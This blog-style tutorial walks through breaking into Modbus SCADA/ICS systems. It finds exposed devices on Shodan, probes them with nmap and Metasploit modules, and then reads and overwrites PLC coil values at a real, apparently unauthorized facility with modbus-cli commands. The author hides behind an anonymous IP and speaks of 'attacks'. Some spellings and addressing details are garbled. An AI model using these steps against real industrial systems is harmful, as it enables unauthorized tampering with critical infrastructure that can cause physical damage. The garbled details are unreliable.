Exploiting SCADA/ICS Systems

Breaching SCADA systems' security is not hard or easy. It is all up to using the appropriate tools to leverage vulnerabilities within these frameworks. This article aims to shine the process of accessing an organization's SCADA systems and interfacing with critical elements, including Programmable Logic Controllers (PLCs). We'll explore how to communicate with these systems, bypassing traditional authentication protocols.

If you don’t know what these systems are, you can read more in the SCADA/ICS post.

We have to understand that SCADA/ICS systems do NOT use the usual protocols that we are used to, such as TCP/IP/Ethernet World. Over 1000 different protocols are being used within the SCADA/ICS world, which are developed over a serial connection. Among the most popular is midbus. 

In this tutorial, we'll explore the use of a command line utility named modbus-cli. This Ruby-based tool is designed for interacting with modbus installations, enabling users to enumerate coils as well as read and write to memory registers. It serves as a resource for security professionals to assess the security of SCADA systems utilizing modbus. Conversely, it could also be employed by unethical hackers or cyber warfare operatives to disrupt industrial systems.

Step 1: Download and install modbus-cli

Step 2: Schnider Electric and Modicon Terminology

Before moving forward, let's pause to familiarize ourselves with some important terms. The mosbus-cli tool is compatible with the memory terminology used by Modicon as well as the proprietary memory addressing system developed by Schneider Electric. For an overview of the Schneider Electric terminology, refer to the table provided in Schneider's official documentation below.

Note that double words (32-bits) in memory are designated %MD, words (16-bit) are designated with %MW, bytes (8 bits) with %MB and bits %MX.

modbus-cli also accepts Modicon memory address nomenclature as well.

As you can see from the table above, Discrete Output coils have memory addresses between 1-9999, Discrete Input Contacts between 10001-19999, Analog Input Registers between 30001-39999 and finally, Analog Output Holding Registers between 40001-49999.

Step 4: Find a Target on Shodan

Numerous methods exist to discover connections to these facilities, including using Google hacking, nmap, and Shodan, with Shodan being my preferred tool. If you're not already a Shodan user, now would be an excellent time to create an account.

The modbus-cli tool is specifically designed to interface with the modbus protocol, one of the SCADA/ICS protocols. While this focus may seem narrow, modbus is actually the most commonly implemented protocol across SCADA/ICS systems worldwide. To ensure broad compatibility, even devices not originally designed for modbus often include support for it, facilitating integration with products from various manufacturers.

Modicon introduced modbus in 1979, and since then, it has become part of Schneider Electric of France. Modbus primarily communicates over TCP port 502. By conducting a search on Shodan for "port 502" or "Schneider Electric" within the available banners, one can potentially identify SCADA systems utilizing the modbus protocol.

In this example, I used port:502 filter and selected a Russian country.

I will be using an anonymous IP ADDRESS as I don't want to get in any trouble for doing these types of attacks.

Step 5: Make sure we can ping and check if ports are open

If we are attacking or being attacked the first thing we must do is be able to ping that IP address. As you can see we can successfully ping the IP address.

Now let’s do a Nmap scan on the same IP address. I like to use this command to check if port: 502 is open as modbus uses this port. As you can see below the port is open.

Step 6: Use msfconsole 

“msfconsole” is the main interface to Metasploit Framework (MSF), which is included in Kali Linux. Metasploit is a powerful and widely used tool for penetration testing and security auditing. It provides users with the ability to discover vulnerabilities, craft exploits, and execute security assessments in a structured and comprehensive manner.

We will Metaspolit to make sure this IP address is a functioning SCADA facility with active coils. 

We will use the command search modbus.

From the options presented earlier, our attention will be directed toward two specific tools: modbusdetect and modbus_findunitid.

modbusdetect is designed to ascertain the presence of an active SCADA system, determining whether it is operational. Following this, modbus_findunitid enables communication with the system without the need for authentication.

In the example below using modbusdetect we were able to find out that this system is a currently running SCADA facility. We will use set RHOST as the IP ADDRESS we are targeting and set BENICE 2.

In the example below we were able to communicate with the system without authentication.

Step 7: Address Terminology

Let's start by accessing the data from one of the Schneider Electric locations (the IP has been masked for privacy and security reasons). However, before proceeding, it's essential to explore the methods for specifying addresses on Schneider Electric Modbus devices.

There are primarily two addressing methodologies for these devices and their respective values: the Schneider Electric mode and the Modicon mode. As indicated in the following table, the Schneider Electric addressing convention starts with %M preceding the address. Our approach will start with this convention, moving on to the Modicon terminology subsequently.

Step 8: Reading the Values from the Functioning SCADA facility

Let's now try reading the values of the coils. These will be Boolean (ON/OFF) values. The coils are either ON or OFF with values of 0 or 1. Since we are reading coil values, we use the modicon address of 101 rather than the Schneider address and then read 10 values.

modbus read IP ADDRESS %M100 10

As you can see below, coils 100, 101,103,105,106 and 109 all ON (1), while all the others are off.

Step 9: Writing New Values to the Coils

Now, lets see if we can change those values in the coils. Let's try to turn them all ON. We can do this with the write subcommand. In this case, we will start with the Schneider address terminology %MW100 and place 1's in each coil, turning them all ON.

modbus write <IP> %M100 1 1 1

Please note I change the values back to normal.

Conclusion

Now modbus-cli is a powerful pentesting/hacking tool for the modbus/tcp protocol that is used in SCADA/ICS Systems. It is unacceptable that I was even able to get into the system and change the values on the coils. This company should at least have some kind of security. If I were to go into their system deeper and change all the values to random numbers it would cause lots of issues for this SCADA facility.

If you want to see how you can secure this system please read my other article, Securing SCADA/ICS systems.